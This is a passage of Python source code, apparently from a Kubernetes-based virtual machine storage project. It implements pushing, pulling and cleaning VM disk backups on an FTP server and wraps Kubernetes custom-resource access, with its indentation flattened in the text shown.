# pool_heler.delete_lifecycle(params.pool)
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (params.pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
# if is_remote_vm_backup_exist(params.domain, params.version, params.remote, params.port, params.username, params.password):
# raise ExecuteException('', 'domain %s has exist backup version %s in ftp server. plz check it.' % (
# params.domain, params.version))
# history file
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
ftp_history_file = '/vmbackup/%s/history.json' % params.domain
if ftp.is_exist_file(ftp_history_file):
ftp_history = ftp.get_json_file_data(ftp_history_file)
else:
ftp_history = {}
# upload file
if params.vol:
push_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote,
params.port, params.username, params.password)
else:
fin = []
record = history[params.version]
try:
for disk in list(record.keys()):
push_disk_backup(params.domain, params.pool, disk, record[disk]['version'], params.remote,
params.port, params.username, params.password)
fin.append(disk)
except:
for disk in fin:
delete_remote_disk_backup(params.domain, disk, record[disk]['version'], params.remote, params.port,
params.username, params.password)
raise ExecuteException('', 'can not upload backup record to ftp server.')
ftp.upload_file('%s/%s.xml' % (backup_dir, params.version), '/vmbackup/%s' % params.domain)
ftp_history[params.version] = history[params.version]
with open('/tmp/history.json', 'w') as f:
dump(ftp_history, f)
ftp.upload_file("/tmp/history.json", '/vmbackup/%s' % params.domain)
success_print("success pushVMBackup.", {})
# def pushVMDiskBackup(params):
# vm_heler = K8sHelper('VirtualMachine')
# vm_heler.delete_lifecycle(params.domain)
#
# push_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote, params.port, params.username, params.password)
# success_print("success pushVMDiskBackup.", {})
def push_disk_backup(domain, pool, disk, version, remote, port, username, password):
if not port or not username or not password:
raise ExecuteException('', 'ftp port, username, password must be set.')
ftp = FtpHelper(remote, port, username, password)
# if is_remote_disk_backup_exist(domain, disk, version, remote, port, username, password):
# raise ExecuteException('', 'ftp server has exist vm %s backup record version %s. ' % (
# domain, version))
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
os.makedirs(disk_backup_dir)
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file) or not is_disk_backup_exist(domain, pool, disk, version):
raise ExecuteException('', 'not exist vm %s backup record version %s in %s. ' % (
domain, version, history_file))
full_version = None
record = None
with open(history_file, 'r') as f:
history = load(f)
for fv in list(history.keys()):
if fv == 'current':
continue
for v in list(history[fv].keys()):
if v == version:
full_version = fv
record = history[fv][version]
if full_version is None or record is None:
raise ExecuteException('', 'can not get domain %s right backup record version %s in %s. ' % (
domain, version, history_file))
remote_disk_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
# history file
ftp_history_file = '%s/history.json' % remote_disk_dir
if ftp.is_exist_file(ftp_history_file):
ftp.download_file(ftp_history_file, '/tmp/history.json')
with open('/tmp/history.json', 'r') as f:
ftp_history = load(f)
if full_version not in ftp_history:
ftp_history[full_version] = {}
ftp_history[full_version][version] = record
else:
ftp_history = {}
ftp_history[full_version] = {}
ftp_history[full_version][version] = record
with open('/tmp/history.json', 'w') as f:
dump(ftp_history, f)
ftp.upload_file('/tmp/history.json', remote_disk_dir)
# modify checksum file
ftp_checksum_file = '%s/%s/diskbackup/checksum.json' % (remote_disk_dir, full_version)
local_checksum_file = '%s/%s/diskbackup/checksum.json' % (disk_backup_dir, full_version)
if ftp.is_exist_file(ftp_checksum_file):
ftp.download_file(ftp_checksum_file, '/tmp/checksum.json')
with open(local_checksum_file, 'r') as f1:
local_checksum = load(f1)
with open('/tmp/checksum.json', 'r') as f:
remote_checksum = load(f)
else:
with open(local_checksum_file, 'r') as f1:
local_checksum = load(f1)
remote_checksum = {}
for record in record['chains']:
if record['checksum'] not in list(remote_checksum.keys()):
remote_checksum[record['checksum']] = local_checksum[record['checksum']]
# upload disk file
backup_file = '%s/%s/diskbackup/%s' % (
disk_backup_dir, full_version, local_checksum[record['checksum']])
ftp.upload_file(backup_file, '%s/%s/diskbackup' % (remote_disk_dir, full_version))
with open('/tmp/checksum.json', 'w') as f:
dump(remote_checksum, f)
ftp.upload_file('/tmp/checksum.json', '%s/%s/diskbackup' % (remote_disk_dir, full_version))
def pullRemoteBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
# default backup path
checksum_to_pull = []
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'can not find pool path %s' % pool_info['path'])
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
if not os.path.exists(backup_dir):
os.makedirs(backup_dir)
if params.vol:
pull_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote, params.port,
params.username, params.password)
else:
if not is_remote_vm_backup_exist(params.domain, params.version, params.remote, params.port, params.username,
params.password):
raise ExecuteException('', 'can not find vm backup record %s in ftp server %s.' % (
params.version, params.remote))
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
ftp_history_file = '/vmbackup/%s/history.json' % params.domain
ftp_history = ftp.get_json_file_data(ftp_history_file)
record = ftp_history[params.version]
fin = []
try:
for disk in list(record.keys()):
pull_disk_backup(params.domain, params.pool, disk, record[disk]['version'], params.remote, params.port,
params.username, params.password)
fin.append(disk)
ftp.download_file('/vmbackup/%s/%s.xml' % (params.domain, params.version),
'%s/%s.xml' % (backup_dir, params.version))
except ExecuteException as e:
for disk in fin:
delete_disk_backup(params.domain, params.pool, disk, record[disk]['version'])
raise e
history_file = '%s/history.json' % backup_dir
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
else:
history = {}
history[params.version] = record
with open(history_file, 'w') as f:
dump(history, f)
success_print("success pullRemoteBackup.", {})
def pull_disk_backup(domain, pool, disk, version, remote, port, username, password):
# default backup path
ftp = FtpHelper(remote, port, username, password)
remote_backup_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
remote_history_file = '%s/history.json' % remote_backup_dir
remote_history = ftp.get_json_file_data(remote_history_file)
full_version = get_full_version_by_history(disk, version, remote_history)
if full_version not in list(remote_history.keys()) and version not in list(remote_history[full_version].keys()):
raise ExecuteException('',
'can not find disk %s backup record %s in ftp server' % (disk, version))
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'can not find pool path %s' % pool_info['path'])
backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(backup_dir):
os.makedirs(backup_dir)
history_file = '%s/history.json' % backup_dir
if not os.path.exists('%s/%s/diskbackup' % (backup_dir, full_version)):
os.makedirs('%s/%s/diskbackup' % (backup_dir, full_version))
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
if full_version in list(history.keys()) and version in list(history[full_version].keys()):
raise ExecuteException('', 'disk backup %s has exist in pool %s .' % (version, pool))
else:
history = {}
remote_checksum = ftp.get_json_file_data('%s/%s/diskbackup/checksum.json' % (remote_backup_dir, full_version))
record = remote_history[full_version][version]
chains = record['chains']
for chain in chains:
df = '%s/%s/diskbackup/%s' % (remote_backup_dir, full_version, remote_checksum[chain['checksum']])
ftp.download_file(df, '%s/%s/diskbackup/%s' % (backup_dir, full_version, remote_checksum[chain['checksum']]))
if full_version not in list(history.keys()):
history[full_version] = {}
history[full_version][version] = record
with open(history_file, 'w') as f:
dump(history, f)
local_checksum_file = '%s/%s/diskbackup/checksum.json' % (backup_dir, full_version)
if os.path.exists(local_checksum_file):
with open(local_checksum_file, 'r') as f:
local_checksum = load(f)
else:
local_checksum = {}
for chain in chains:
local_checksum[chain['checksum']] = remote_checksum[chain['checksum']]
with open(local_checksum_file, 'w') as f:
dump(local_checksum, f)
def clean_disk_backup(domain, pool, disk, versions):
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
return
# check backup version exist or not
history_file_path = '%s/history.json' % disk_backup_dir
backup_helper = K8sHelper('VirtualMachineBackup')
for version in versions:
if not is_disk_backup_exist(domain, pool, disk, version):
try:
backup_helper.delete(version)
except:
pass
disk_versions = get_disk_backup_version(domain, pool, disk)
for version in disk_versions:
if version not in versions:
delete_disk_backup(domain, pool, disk, version)
try:
backup_helper.delete(version)
except:
pass
def clean_vm_backup(domain, pool, versions):
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
logger.debug('check_pool_active')
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], domain)
if not os.path.exists(backup_dir):
return
# check backup version exist or not
backup_helper = K8sHelper('VirtualMachineBackup')
history_file = '%s/history.json' % backup_dir
if not os.path.exists(history_file):
return
with open(history_file, 'r') as f:
history = load(f)
for v in list(history.keys()):
if v not in versions:
delete_vm_backup(domain, pool, v)
try:
backup_helper.delete(v)
except:
pass
for v in versions:
if v not in list(history.keys()):
try:
backup_helper.delete(v)
except:
pass
def cleanBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
versions = []
if params.version:
for v in params.version.split(','):
versions.append(v.strip())
logger.debug('versions')
logger.debug(versions)
if params.vol:
clean_disk_backup(params.domain, params.pool, params.vol, versions)
else:
clean_vm_backup(params.domain, params.pool, versions)
success_print("success cleanBackup", {})
def clean_disk_remote_backup(domain, disk, versions, remote, port, username, password):
backup_helper = K8sHelper('VirtualMachineBackup')
for version in versions:
if not is_remote_disk_backup_exist(domain, disk, version, remote, port, username, password):
# try:
# backup_helper.delete(version)
# except:
# pass
pass
disk_versions = get_remote_disk_backup_version(domain, disk, remote, port, username, password)
for version in disk_versions:
if version not in versions:
delete_remote_disk_backup(domain, disk, version, remote, port, username, password)
# try:
# backup_helper.delete(version)
# except:
# pass
pass
def clean_vm_remote_backup(domain, versions, remote, port, username, password):
ftp = FtpHelper(remote, port, username, password)
remote_backup_dir = '/vmbackup/%s' % domain
remote_history_file = '%s/history.json' % remote_backup_dir
remote_history = ftp.get_json_file_data(remote_history_file)
if remote_history is None:
remote_history = {}
for v in list(remote_history.keys()):
if v not in versions:
delete_remote_vm_backup(domain, v, remote, port, username, password)
def cleanRemoteBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
versions = []
if params.version:
for v in params.version.split(','):
versions.append(v.strip())
if params.vol:
clean_disk_remote_backup(params.domain, params.vol, versions, params.remote, params.port, params.username,
params.password)
else:
clean_vm_remote_backup(params.domain, versions, params.remote, params.port, params.username, params.password)
success_print("success cleanRemoteBackup", {})
def scanBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (params.pool, pool_info['path']))
backup_helper = K8sHelper('VirtualMachineBackup')
if params.vol:
backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], params.domain, params.vol)
if not os.path.exists(backup_dir):
success_print("success scanBackup", {})
return
# check backup version exist or not
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
disk_full_versions = get_disk_backup_full_version(params.domain, params.pool, params.vol)
for fv in disk_full_versions:
for v in list(history[fv].keys()):
if not backup_helper.exist(v):
data = {
'domain': params.domain,
'disk': params.vol,
'pool': params.pool,
'full': fv,
'time': history[fv][v]['time'],
'version': v
}
backup_helper.create(v, 'backup', data)
backup_helper.add_label(v, params.domain)
else:
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
if not os.path.exists(backup_dir):
success_print("success scanBackup", {})
return
# check backup version exist or not
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
for v in list(history.keys()):
if not backup_helper.exist(v):
time = ''
vm_full = ''
for disk in list(history[v].keys()):
time = history[v][disk]['time']
vm_full = history[v][disk]['vm_full']
data = {
'domain': params.domain,
'disk': '',
'pool': params.pool,
'full': vm_full,
'time': time,
'version': v
}
backup_helper.create(v, 'backup', data)
backup_helper.add_label(v, params.domain)
success_print("success scanBackup", {})
def deleteRemoteBackupServer(params):
logger.debug("delete remote backup server. %s %s" % (params.remote, params.port))
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
dirs = ftp.listdir("/vmbackup")
for dir in dirs:
full_dir = "/vmbackup/%s" % dir
if ftp.is_exist_dir(full_dir):
logger.debug("delete dir %s" % full_dir)
ftp.delete_dir(full_dir)
success_print("success delete remote backup server.", {})
def showDiskPool(params):
prepare_info = get_disk_prepare_info_by_path(params.path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
success_print("success show pool info by disk path", pool_info)
def prepare_disk_by_metadataname(uuid):
success = False
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.metadata.name==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\n\\"}{end}"' % uuid)
break
except Exception as e:
pass
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 4:
success = True
if not success:
raise ExecuteException('', 'can not get right disk info from k8s by metadataname.')
lines = output.splitlines()
if len(lines) != 1:
logger.debug(lines)
raise ExecuteException('', 'can not get right disk info from k8s by path.')
columns = lines[0].split()
if len(columns) != 4:
logger.debug(columns)
raise ExecuteException('', 'can not get right disk info from k8s by path. less info')
diskinfo = {}
pool = columns[0]
disk = columns[1]
uni = columns[2]
nodeName = columns[3]
# if is_pool_exists(pool):
# pool_info = get_pool_info(pool)
# pool = os.path.basename(pool_info['path'])
disk_prepare(pool, disk, uni)
return diskinfo
def get_disk_prepare_info_by_path(path):
logger.debug('get_disk_prepare_info_by_path: %s' % path)
try:
current = try_fix_disk_metadata(path)
if current:
path = current
except:
logger.debug(traceback.format_exc())
disk = try_get_diskmn_by_path(path)
try:
volume = get_vol_info_from_k8s(disk)
disk_helper = K8sHelper('VirtualMachineDisk')
diskinfo = {}
diskinfo['poolname'] = volume['poolname']
diskinfo['disk'] = disk
diskinfo['uni'] = volume['uni']
jsondict = disk_helper.get(disk)
spec = get_spec(jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
diskinfo['nodeName'] = nodeName
diskinfo['pool'] = volume['pool']
diskinfo['path'] = volume['current']
return diskinfo
except:
pass
logger.debug('get_disk_prepare_info_by_path: %s' % path)
success = False
for i in range(30):
try:
if not success:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.spec.volume.filename==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\t\\"}{.spec.volume.pool}{\\"\\n\\"}{end}"' % path)
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 5:
success = True
if not success:
output = rpcCallAndGetOutput(
'kubectl get vmdsn -o=jsonpath="{range .items[?(@.spec.volume.filename==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\t\\"}{.spec.volume.pool}{\\"\\n\\"}{end}"' % path)
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 5:
success = True
if not success:
output = rpcCallAndGetOutput(
'kubectl get vmdi -o=jsonpath="{range .items[?(@.spec.volume.filename==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\t\\"}{.spec.volume.pool}{\\"\\n\\"}{end}"' % path)
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 5:
success = True
break
except Exception:
logger.debug(traceback.format_exc())
if not success:
raise ExecuteException('', 'can not get right disk info from k8s by path: %s. less info' % path)
lines = output.splitlines()
columns = lines[0].split()
if len(columns) != 5:
logger.debug(columns)
raise ExecuteException('', 'can not get right disk info from k8s by path: %s. less info' % path)
diskinfo = {}
diskinfo['poolname'] = columns[0]
diskinfo['disk'] = columns[1]
diskinfo['uni'] = columns[2]
diskinfo['nodeName'] = columns[3]
diskinfo['pool'] = columns[4]
diskinfo['path'] = path
return diskinfo
def prepare_disk_by_path(path):
diskinfo = get_disk_prepare_info_by_path(path)
pool = diskinfo['poolname']
disk = diskinfo['disk']
uni = diskinfo['uni']
nodeName = diskinfo['nodeName']
disk_prepare(pool, disk, uni)
return diskinfo
def remote_prepare_disk_by_path(ip, path):
diskinfo = get_disk_prepare_info_by_path(path)
pool = diskinfo['poolname']
disk = diskinfo['disk']
uni = diskinfo['uni']
remote_disk_prepare(ip, pool, disk, uni)
return diskinfo
def release_disk_by_metadataname(uuid):
success = False
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.metadata.name==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\n\\"}{end}"' % uuid)
break
except Exception:
logger.debug(traceback.format_exc())
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 4:
success = True
if not success:
raise ExecuteException('', 'can not get right disk info from k8s by metadataname.')
lines = output.splitlines()
if len(lines) != 1:
logger.debug(lines)
raise ExecuteException('', 'can not get right disk info from k8s by path.')
columns = lines[0].split()
if len(columns) != 4:
logger.debug(columns)
raise ExecuteException('', 'can not get right disk info from k8s by path. less info')
pool = columns[0]
disk = columns[1]
uni = columns[2]
def release_disk_by_path(path):
diskinfo = get_disk_prepare_info_by_path(path)
pool = diskinfo['poolname']
disk = diskinfo['disk']
uni = diskinfo['uni']
if __name__ == '__main__':
print(get_node_name_by_node_ip('172.16.1.25'))
# print get_disk_prepare_info_by_path('/var/lib/libvirt/cstor/39829673ec934c2786b7715a96a7d878/39829673ec934c2786b7715a96a7d878/ff8538567f1a4ec8ab0257e5b2ece4b3/30ca01637b444a0c9c9e3c0adcd3e364')
# print get_disks_spec('vm006')
# print get_disk_prepare_info_by_path('/var/lib/libvirt/cstor/1709accf174vccaced76b0dbfccdev/1709accf174vccaced76b0dbfccdev/vm003migratevmdisk2/snapshots/vm003migratevmdisk2.1')
# prepare_disk_by_path(
# '/var/lib/libvirt/cstor/1709accdd174caced76b0dbfccdev/1709accdd174caced76b0dbfccdev/vm00aadd6coddpdssdn/vm00aadd6coddpdssdn')
# prepare_disk_by_metadataname('vm00aadd6coddpdssdn')
# release_disk_by_path('/var/lib/libvirt/cstor/1709accdd174caced76b0dbfccdev/1709accdd174caced76b0dbfccdev/vm00aadd6coddpdssdn/vm00aadd6coddpdssdn')
# release_disk_by_metadataname('vm00aadd6coddpdssdn')
```
#### File: kubeext-SDS-python3/utils/k8s.py
```python
import operator
import socket
from json import dumps
from kubernetes import client, config
import os, sys, configparser
from sys import exit
import logging
import logging.handlers
from kubernetes.client import V1DeleteOptions
from kubernetes.client.rest import ApiException
from utils.exception import ExecuteException
class parser(configparser.ConfigParser):
def __init__(self, defaults=None):
configparser.ConfigParser.__init__(self, defaults=None)
def optionxform(self, optionstr):
return optionstr
cfg = "/etc/kubevmm/config"
if not os.path.exists(cfg):
cfg = "/home/kubevmm/bin/config"
config_raw = parser()
config_raw.read(cfg)
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
LOG = '/var/log/kubesds3.log'
RETRY_TIMES = 30
def set_logger(header, fn):
logger = logging.getLogger(header)
handler1 = logging.StreamHandler()
handler2 = logging.handlers.RotatingFileHandler(filename=fn, maxBytes=10000000, backupCount=10)
logger.setLevel(logging.DEBUG)
handler1.setLevel(logging.ERROR)
handler2.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(lineno)s %(levelname)s %(message)s")
handler1.setFormatter(formatter)
handler2.setFormatter(formatter)
logger.addHandler(handler1)
logger.addHandler(handler2)
return logger
k8s_logger = set_logger(os.path.basename(__file__), LOG)
resources = {}
for kind in ['VirtualMachine', 'VirtualMachinePool', 'VirtualMachineDisk', 'VirtualMachineDiskImage',
'VirtualMachineDiskSnapshot', 'VirtualMachineBackup']:
resource = {}
for key in ['version', 'group', 'plural']:
resource[key] = config_raw.get(kind, key)
resources[kind] = resource
def get(name, kind):
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[kind]['group'],
version=resources[kind]['version'],
namespace='default',
plural=resources[kind]['plural'],
name=name)
return jsondict
def create(name, data, kind):
hostname = get_hostname_in_lower_case()
jsondict = {'spec': {'volume': {}, 'nodeName': hostname, 'status': {}},
'kind': kind, 'metadata': {'labels': {'host': hostname}, 'name': name},
'apiVersion': '%s/%s' % (resources[kind]['group'], resources[kind]['version'])}
jsondict = updateJsonRemoveLifecycle(jsondict, data)
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
return client.CustomObjectsApi().create_namespaced_custom_object(
group=resources[kind]['group'], version=resources[kind]['version'], namespace='default',
plural=resources[kind]['plural'], body=body)
def update(name, data, kind):
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[kind]['group'], version=resources[kind]['version'], namespace='default',
plural=resources[kind]['plural'], name=name, body=data)
def delete(name, data, kind):
k8s_logger.debug('deleteVMBackupdebug %s' % name)
return client.CustomObjectsApi().delete_namespaced_custom_object(
group=resources[kind]['group'], version=resources[kind]['version'], namespace='default',
plural=resources[kind]['plural'], name=name, body=data)
def addPowerStatusMessage(jsondict, reason, message):
if jsondict:
status = {'conditions': {'state': {'waiting': {'message': message, 'reason': reason}}}}
spec = get_spec(jsondict)
if spec:
spec['status'] = status
return jsondict
def get_spec(jsondict):
spec = jsondict.get('spec')
if not spec:
raw_object = jsondict.get('raw_object')
if raw_object:
spec = raw_object.get('spec')
return spec
def deleteLifecycleInJson(jsondict):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
return jsondict
def updateJsonRemoveLifecycle(jsondict, body):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
spec.update(body)
return jsondict
def hasLifeCycle(jsondict):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
return True
return False
def removeLifecycle(jsondict):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
return jsondict
def get_hostname_in_lower_case():
cfg = "/etc/kubevmm/config"
if not os.path.exists(cfg):
cfg = "/home/kubevmm/bin/config"
config_raw = parser()
config_raw.read(cfg)
prefix = config_raw.get('Kubernetes', 'hostname_prefix')
if prefix == 'vm':
return 'vm.%s' % socket.gethostname().lower()
else:
return socket.gethostname().lower()
def changeNode(jsondict, newNodeName):
if jsondict:
jsondict['metadata']['labels']['host'] = newNodeName
spec = get_spec(jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = newNodeName
return jsondict
def replaceData(jsondict):
all_kind = {'VirtualMachine': 'domain',
'VirtualMachinePool': 'pool',
'VirtualMachineDisk': 'volume',
'VirtualMachineDiskImage': 'volume',
'VirtualMachineDiskSnapshot': 'volume',
'VirtualMachineBackup': 'backup'}
mkind = jsondict['kind']
mn = jsondict['metadata']['name']
k8s = K8sHelper(mkind)
current = k8s.get(mn)
host = jsondict['metadata']['labels']['host']
# nodename = jsondicts[i]['metadata']['labels']['host']
changeNode(current, host)
if jsondict:
key = all_kind[mkind]
if 'spec' in list(jsondict.keys()) and isinstance(jsondict['spec'], dict) and key in list(jsondict['spec'].keys()):
data = jsondict['spec'][key]
if current:
current['spec'][key] = data
return current
def get_node_name(jsondict):
if jsondict:
return jsondict['metadata']['labels']['host']
return None
class K8sHelper(object):
def __init__(self, kind):
self.kind = kind
def exist(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[self.kind]['group'],
version=resources[self.kind][
'version'],
namespace='default',
plural=resources[self.kind]['plural'],
name=name)
return True
except ApiException as e:
if e.reason == 'Not Found':
return False
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('K8sError', 'can not get %s %s response from k8s.' % (self.kind, name))
def get(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[self.kind]['group'],
version=resources[self.kind][
'version'],
namespace='default',
plural=resources[self.kind]['plural'],
name=name)
return jsondict
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not get %s %s on k8s.' % (self.kind, name))
def get_data(self, name, key):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[self.kind]['group'],
version=resources[self.kind][
'version'],
namespace='default',
plural=resources[self.kind]['plural'],
name=name)
if 'spec' in list(jsondict.keys()) and isinstance(jsondict['spec'], dict) and key in list(jsondict['spec'].keys()):
return jsondict['spec'][key]
return None
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not get %s %s on k8s.' % (self.kind, name))
def get_create_jsondict(self, name, key, data):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
hostname = get_hostname_in_lower_case()
jsondict = {'spec': {'volume': {}, 'nodeName': hostname, 'status': {}},
'kind': self.kind, 'metadata': {'labels': {'host': hostname}, 'name': name},
'apiVersion': '%s/%s' % (resources[self.kind]['group'], resources[self.kind]['version'])}
jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
return body
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('k8sError', 'can not get %s %s data on k8s.' % (self.kind, name))
def create(self, name, key, data):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if self.exist(name):
return
hostname = get_hostname_in_lower_case()
jsondict = {'spec': {'volume': {}, 'nodeName': hostname, 'status': {}},
'kind': self.kind, 'metadata': {'labels': {'host': hostname}, 'name': name},
'apiVersion': '%s/%s' % (resources[self.kind]['group'], resources[self.kind]['version'])}
jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
return client.CustomObjectsApi().create_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], body=body)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
error_print(500, 'can not create %s %s on k8s.' % (self.kind, name))
def add_label(self, name, domain):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = self.get(name)
jsondict['metadata']['labels']['domain'] = domain
# jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not modify %s %s on k8s.' % (self.kind, name))
def update(self, name, key, data):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = self.get(name)
if 'spec' in list(jsondict.keys()) and isinstance(jsondict['spec'], dict) and key in list(jsondict['spec'].keys()) \
and operator.eq(jsondict['spec'][key], data) == 0:
return
